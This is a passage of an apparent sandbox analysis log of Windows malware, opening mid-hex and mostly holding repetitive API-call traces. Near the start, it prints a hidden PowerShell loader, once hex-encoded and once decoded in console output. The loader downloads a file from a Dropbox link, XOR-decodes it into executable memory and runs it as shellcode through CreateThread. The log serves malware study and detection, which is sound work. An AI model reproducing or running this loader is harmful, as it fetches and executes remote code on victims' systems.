E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$harsan="""""";for($i=0;$i -le $radetaa.Length-2;$i=$i+2){$MMOMM=$radetaa[$i]+$radetaa[$i+1];$harsan= $harsan+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($harsan));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($gattecaqq));while(true){}"
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: call
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -command "$gattecaqq ="$radetaa="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F3376647A36747739347836783178646266366F61702F32303233313030322E7A69703F726C6B65793D39713670663431736F78306B6377346C3377336C623268767526646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$harsan="""""";for($i=0;$i -le $radetaa.Length-2;$i=$i+2){$MMOMM=$radetaa[$i]+$radetaa[$i+1];$harsan= $harsan+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($harsan));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($gattecaqq));while(true){}"
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Exception setting "SecurityProtocol": "The requested security protocol is not s
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: upported."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: At line:1 char:28
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + [Net.ServicePointManager]:: <<<< SecurityProtocol=[Enum]::ToObject([Net.Secur
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: ityProtocolType], 3072);$aa='[DllImport("kernel32.dll")]public static extern In
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: tPtr GlobalAlloc(uint b,uint c);';$b=Add-Type -MemberDefinition $aa -Name "AAA"
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: -PassThru;$abab = '[DllImport("kernel32.dll")]public static extern bool Virtu
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: alProtect(IntPtr a,uint b,uint c,out IntPtr d);';$aab=Add-Type -MemberDefinitio
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: n $abab -Name "AAB" -PassThru;$c = New-Object System.Net.WebClient;$d="https://
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: dl.dropboxusercontent.com/scl/fi/3vdz6tw94x6x1xdbf6oap/20231002.zip?rlkey=9q6pf
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: 41sox0kcw4l3w3lb2hvu&dl=0";$bb='[DllImport("kernel32.dll")]public static extern
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr d,uint e,IntPtr f);';$ccc=
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: Add-Type -MemberDefinition $bb -Name "BBB" -PassThru;$ddd='[DllImport("kernel32
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: .dll")]public static extern IntPtr WaitForSingleObject(IntPtr a,uint b);';$fff=
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: Add-Type -MemberDefinition $ddd -Name "DDD" -PassThru;$e=112;do { try { $c.Hea
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: ders["user-agent"] = "connnecting...";$xmpw4=$c.DownloadData($d);$x0 = $b::Glob
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: alAlloc(0x0040, $xmpw4.Length+0x100);$old = 0;$aab::VirtualProtect($x0, $xmpw4.
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: Length+0x100, 0x40, [ref]$old);for ($h = 1;$h -lt $xmpw4.Length;$h++) {[System.
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: Runtime.InteropServices.Marshal]::WriteByte($x0, $h-1, ($xmpw4[$h] -bxor $xmpw4
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: [0]) );};try{throw 1;}catch{$handle=$ccc::CreateThread(0,0,$x0,0,0,0);$fff::Wai
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: tForSingleObject($handle, 500*1000);};$e=222;}catch{sleep 11;$e=112;}}while($e
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: -eq 112);
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x00000137
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005303a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530da0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530da0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530da0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530da0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530da0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530da0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005301e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005301e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005301e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530aa0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530f20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530f20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530f20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530f20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530f20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530f20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530f20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530f20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530f20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530f20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530f20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530f20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530f20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530f20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530e60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530e60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530e60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530e60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530e60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530e60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00530e60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055b110
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055bb10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055bb10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055bb10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055b1d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 1703936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a01000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0275a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02752000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0275c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02753000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02754000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02755000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02756000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02757000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02758000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02759000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05030000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05031000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05034000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05035000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05036000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05037000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05038000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05039000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

